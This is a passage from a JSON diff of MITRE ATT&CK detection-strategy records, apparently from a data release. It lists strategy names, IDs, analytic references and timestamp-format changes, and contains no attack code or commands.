+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0018",
+                            "external_id": "DET0018"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavior-chain, platform-aware detection strategy for T1129 Shared Modules",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--cc5f309c-6eb0-4f96-ba1a-0f4fd3bc1b79",
+                        "x-mitre-analytic--01c969ef-7057-44bd-bced-9b64a98234ec",
+                        "x-mitre-analytic--52a5dffb-f3a3-45fc-97b3-2c09fed8e0b4"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.685000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--31f41970-898c-4c64-b018-e03eabb81916",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0052",
+                            "external_id": "DET0052"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Abuse of Sudo and Sudo Caching",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0994985d-1d45-478e-9f1c-f407eb297007",
+                        "x-mitre-analytic--8825b589-3a6a-483a-9fc0-a4d00b1183ab"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ed9ef930-ec1f-4e57-a110-9b647e2ca195",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0131",
+                            "external_id": "DET0131"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Exfiltration Over Alternative Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--1543bc4a-7614-417a-85b9-d67e3da0350c",
+                        "x-mitre-analytic--7402eb3b-9349-478a-a8e9-7ee72c4b67c5",
+                        "x-mitre-analytic--c545f39e-d1a2-4b0e-bdf1-6a84226557e9",
+                        "x-mitre-analytic--8dbd751b-a2cf-418a-b409-daae78a250f8",
+                        "x-mitre-analytic--3810988a-78be-4628-a9a5-500020f9c075"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--5d368ccf-2946-4a01-bfae-c18064b6187a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0503",
+                            "external_id": "DET0503"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Exfiltration Over Symmetric Encrypted Non-C2 Protocol",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4e5ffb58-75de-4305-a439-98ca3499f45e",
+                        "x-mitre-analytic--d8978977-d2c8-4c1c-a6c1-0176330e3446",
+                        "x-mitre-analytic--bcab4073-2316-4685-be6c-fb5ab92b22be",
+                        "x-mitre-analytic--d73a1356-7f4f-4f54-afca-437736e5f53c"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--82e20b1f-300e-43cc-9259-1d506ef5d1f8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0376",
+                            "external_id": "DET0376"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Network Service Discovery Across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--84299e85-2a7e-4f78-9767-3d29aa58857a",
+                        "x-mitre-analytic--287661d0-714e-4bb4-a9f7-c272ad0018b1",
+                        "x-mitre-analytic--28fbe1b0-9663-4997-9d4e-ef43803be114",
+                        "x-mitre-analytic--5d7b1be3-1c8a-40bf-a4d2-85e26dd82d76"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d33ffd4e-6328-4b10-84c0-7ad4a241b02d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0269",
+                            "external_id": "DET0269"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Remote Service Logins and Post-Access Activity",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--34c5e959-876b-4851-8ebf-bfaf97e9e609",
+                        "x-mitre-analytic--a366262a-ba79-4b74-be16-0b139d546651",
+                        "x-mitre-analytic--e26778ca-0fd9-4a1b-9d1d-d8ba561b065a",
+                        "x-mitre-analytic--dfabf07a-8179-43f5-abf6-699202c10343",
+                        "x-mitre-analytic--8a534291-3b75-45ba-9f7b-b952251a3f03"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c7471b0b-ac10-4eac-aae6-cfa821e707dd",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0221",
+                            "external_id": "DET0221"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for T1123 Audio Capture Across Windows, Linux, macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--5aaad268-48fb-4826-9f68-b666e1b4a3bf",
+                        "x-mitre-analytic--3ac9b4c2-9137-4d20-9619-01029d656874",
+                        "x-mitre-analytic--f79a68ff-07f4-49ba-849b-9edb636f0b39"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--2b666abc-e642-4f40-abec-36bd48f1f15c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.673000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0338",
+                            "external_id": "DET0338"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Use Alternate Authentication Material (T1550)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e7ce6bda-a4d3-43a4-afa0-34d57c34ef0d",
+                        "x-mitre-analytic--fbe17895-73cc-432e-8576-f6cab851feb1",
+                        "x-mitre-analytic--367cfbd9-fcfd-4336-863e-b6917ff71cb4",
+                        "x-mitre-analytic--7fb5fe4f-ecd1-45a1-8a0f-dc913587e650",
+                        "x-mitre-analytic--2127b359-24b0-40e2-a202-67e53d5be3b0",
+                        "x-mitre-analytic--1313533a-06c7-44ea-8d75-9a23d3ea23cc",
+                        "x-mitre-analytic--91681b37-7fc7-418c-b4fd-35bebe1d151e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.673000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--afdf49f9-905d-49e4-9e42-5726f35e87e4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0185",
+                            "external_id": "DET0185"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for Use Alternate Authentication Material: Application Access Token (T1550.001)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--43ccb88d-8d8a-4ddb-9ffd-3d897fba76a3",
+                        "x-mitre-analytic--d203b007-e462-4842-82ce-c97f52c17e39",
+                        "x-mitre-analytic--dfad1a86-de44-40b2-95b5-9b18c4103cbb",
+                        "x-mitre-analytic--9680d434-3470-4a35-bf48-1785ab14d831",
+                        "x-mitre-analytic--03216652-ada9-4c1e-88c4-923c2cb60614"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8374a5e5-6d9f-4896-9546-a4d998188ac5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0364",
+                            "external_id": "DET0364"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection Strategy for WMI Execution Abuse on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--17687fa0-bfbf-4ff2-9eb0-520538e6af31"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.683000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ae37afa8-87d5-4091-ac33-010e78eefe97",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0021",
+                            "external_id": "DET0021"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection for Service Stop across Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--00449d4c-48c7-4977-bf38-86fbc4e79285",
+                        "x-mitre-analytic--ea793457-89e6-47d2-8ae1-7fd2bd814f82",
+                        "x-mitre-analytic--86ea7b9c-c017-463d-b5d5-377f6dbfae1e",
+                        "x-mitre-analytic--9e12e1f0-1547-4008-8755-2b3bc1c00279"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b13116ed-e9c0-4cd5-81f6-676074078477",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0329",
+                            "external_id": "DET0329"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection for T1490 - Inhibit System Recovery",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--decb2be7-1a0a-46dd-ab48-cf6258c0185e",
+                        "x-mitre-analytic--135452f6-c760-42a6-8a3f-d09c33f05369",
+                        "x-mitre-analytic--e2fb4be5-bd70-45d6-89ad-e687bc475285",
+                        "x-mitre-analytic--55a0743e-cdc1-44d1-94c7-cf3837e3ef2f",
+                        "x-mitre-analytic--e50f8247-73da-4461-a560-745ed84f1209"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4554ad15-dc0a-44f8-92b6-b8e7dc64385e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.676000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0100",
+                            "external_id": "DET0100"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Asynchronous Procedure Call (APC) Injection via Remote Thread Queuing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f0fce510-b195-4688-a4ac-b78584febd08"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.676000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ca871237-8615-47b7-9981-92d1d920d346",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0142",
+                            "external_id": "DET0142"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of CLI Abuse on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3dc28690-699a-4f6d-ad4b-278aa2dd8c59"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--55e10a13-d18d-4ce5-a773-c4ec6bd68d52",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.678000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0251",
+                            "external_id": "DET0251"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Cloud Group Enumeration via API and CLI Access",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ef4f995e-6f20-42b7-802e-555ac54ab7b9",
+                        "x-mitre-analytic--bb94692e-e73c-449c-a17e-0658bebbfd93",
+                        "x-mitre-analytic--54ae99be-c089-4e96-97f5-52af2892ae25"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.678000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dcc65927-b113-4f42-b7bd-adb6caebf24a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0165",
+                            "external_id": "DET0165"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Behavioral Detection of Command History Clearing",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--0ebcdeba-7b02-4f1c-96c9-a602b3663446",
+                        "x-mitre-analytic--9199891a-1543-4f51-be59-4fffb03dfd43",
+                        "x-mitre-analytic--01b79770-a269-4b4d-bf09-a4760bae9c94",
+                        "x-mitre-analytic--d17e0719-d338-47eb-a5b4-8616749584cf",
+                        "x-mitre-analytic--7879313f-abf1-487a-b4d3-813f385ddce3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--8582f5e6-44a5-4950-b7e8-a3e1b6d58d63",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.683000+00:00",
